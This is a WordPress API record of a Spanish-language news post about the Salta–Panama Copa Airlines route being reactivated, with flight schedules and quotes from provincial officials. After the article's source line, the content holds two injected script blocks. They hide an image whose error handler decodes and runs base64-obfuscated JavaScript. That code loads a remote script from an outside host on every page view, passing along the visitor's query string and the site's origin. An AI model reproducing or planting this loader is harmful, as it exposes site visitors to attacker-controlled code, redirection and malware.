{"id":5018,"date":"2025-04-04T11:39:24","date_gmt":"2025-04-04T14:39:24","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5018"},"modified":"2025-08-13T23:37:19","modified_gmt":"2025-08-14T02:37:19","slug":"gustavo-saenz-anuncio-la-reactivacion-de-la-ruta-aerea-salta-panama-con-copa-airlines","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5018","title":{"rendered":"Gustavo S\u00e1enz anunci\u00f3 la reactivaci\u00f3n de la ruta a\u00e9rea Salta &#8211; Panam\u00e1 con Copa Airlines"},"content":{"rendered":"\n<h5 class=\"wp-block-heading\"><em><strong>\u201d Por primera vez en la historia, un aeropuerto del norte argentino cuenta con cuatro rutas internacionales\u201d, afirm\u00f3 el Gobernador. Comenzar\u00e1 a operar el 23 de septiembre, con tres frecuencias semanales.<\/strong><\/em><\/h5>\n\n\n\n<p>Alcanzando un hito hist\u00f3rico con cuatro conexiones internacionales, el 23 de septiembre se reactivar\u00e1 la ruta a\u00e9rea Salta \u2013 Panam\u00e1 con Copa Airlines.<\/p>\n\n\n\n<p>El anuncio fue realizado por el gobernador&nbsp;<strong>Gustavo S\u00e1enz<\/strong>, quien destac\u00f3 que \u201cpor primera vez en la historia Salta tendr\u00e1 cuatro rutas a\u00e9reas internacionales\u201d. Consider\u00f3 que \u201cno es solo una nueva conexi\u00f3n a\u00e9rea; es una puerta abierta al mundo; una oportunidad estrat\u00e9gica para seguir posicionando a Salta en el mapa del turismo internacional\u201d.<\/p>\n\n\n\n<p>El logro es el resultado de un trabajo conjunto entre el Gobierno de la Provincia de Salta y Copa Airlines, que gestionaron la recuperaci\u00f3n de esta ruta clave, suspendida durante la pandemia.&nbsp;<\/p>\n\n\n\n<p>\u201cLa nueva conexi\u00f3n fortalecer\u00e1 la llegada de turistas internacionales y facilitar\u00e1 la expansi\u00f3n de las oportunidades comerciales para la provincia\u201d, expres\u00f3 S\u00e1enz.<\/p>\n\n\n\n<p>Asimismo evalu\u00f3 que sumar conectividad \u201ces clave para potenciar nuestro destino tur\u00edstico, generando empleo y desarrollo. Tenemos lo que se necesita para ser la puerta de entrada a la Argentina\u201d.<\/p>\n\n\n\n<p>Por su parte, la ministra de Turismo y Deportes de Salta,<strong>&nbsp;Manuela Arancibia<\/strong>&nbsp;destac\u00f3 la importancia de esta reactivaci\u00f3n: \u201cLa vuelta de la ruta a\u00e9rea Panam\u00e1-Salta es un paso fundamental para consolidar a nuestra provincia como un destino tur\u00edstico internacional. Esta conexi\u00f3n permitir\u00e1 aumentar el flujo de turistas de Am\u00e9rica Central, del Norte y Europa, beneficiando a toda la cadena de valor del turismo en Salta. Adem\u00e1s, nos posiciona como un punto clave para quienes elijan al norte argentino como su pr\u00f3ximo destino.\u201d<\/p>\n\n\n\n<p><strong>Detalles operativos de la nueva ruta<\/strong><\/p>\n\n\n\n<p>La nueva frecuencia entre Salta y Panam\u00e1 operar\u00e1 con aviones Boeing 737 &#8211; 800, con capacidad para 16 pasajeros en clase ejecutiva y 150 en cabina principal.&nbsp;<\/p>\n\n\n\n<p>Copa Airlines iniciar\u00e1 las operaciones el 23 de septiembre, con 3 frecuencias semanales, los d\u00edas martes, jueves y domingos, partiendo del Aeropuerto Internacional de Tocumen, en la Ciudad de Panam\u00e1 a las 16:40 p.m. (hora local), con arribo estimado a Salta a las 00:24 (hora local).&nbsp;<\/p>\n\n\n\n<p>Los vuelos de regreso saldr\u00e1n desde el Aeropuerto Internacional Mart\u00edn Miguel de G\u00fcemes, en Salta, los d\u00edas lunes, mi\u00e9rcoles y viernes las 02:01(hora local), con llegada a Ciudad de Panam\u00e1 a las 05:30 (horalocal).&nbsp;<\/p>\n\n\n\n<p>Los pasajes est\u00e1n disponibles en&nbsp;<a href=\"https:\/\/www.copaair.com\/\">https:\/\/www.copaair.com\/<\/a><\/p>\n\n\n\n<p><strong>Hub de las Am\u00e9ricas en Panam\u00e1<\/strong><\/p>\n\n\n\n<p>Es un centro estrat\u00e9gico de conexiones internacionales, permitiendo a los pasajeros viajar desde Salta a 85 ciudades en 32 pa\u00edses, incluyendo 16 destinos en Estados Unidos, sin necesidad de pasar por Buenos Aires. Esto no solo potenciar\u00e1 el turismo receptivo, sino que tambi\u00e9n facilitar\u00e1 la exportaci\u00f3n de productos salte\u00f1os a mercados internacionales.<\/p>\n\n\n\n<p>As\u00ed, el Norte Argentino quedar\u00e1 conectado con 80 destinos en Norte, Centro y Sudam\u00e9rica, el Caribe y Europa.<\/p>\n\n\n\n<p>Con esta nueva conexi\u00f3n a\u00e9rea, Salta fortalece su red de vuelos internacionales, sum\u00e1ndose a las rutas existentes hacia Lima (Per\u00fa), San Pablo (Brasil) y Asunci\u00f3n (Paraguay).&nbsp;<\/p>\n\n\n\n<p>Este avance posiciona a la provincia como un destino clave en Sudam\u00e9rica, atrayendo turistas de todo el mundo y potenciando el desarrollo econ\u00f3mico local.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201d Por primera vez en la historia, un aeropuerto del norte argentino cuenta con cuatro rutas internacionales\u201d, afirm\u00f3 el Gobernador. Comenzar\u00e1 a operar el 23 de septiembre, con tres frecuencias semanales. Alcanzando un hito hist\u00f3rico con cuatro conexiones internacionales, el 23 de septiembre se reactivar\u00e1 la ruta a\u00e9rea Salta \u2013 Panam\u00e1 con Copa Airlines. El [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5019,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5,20,18],"tags":[],"class_list":{"0":"post-5018","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos","8":"category-empresas","9":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5018"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5018"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5018\/revisions"}],"predecessor-version":[{"id":6532,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5018\/revisions\/6532"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5019"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5018"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5018"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5018"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}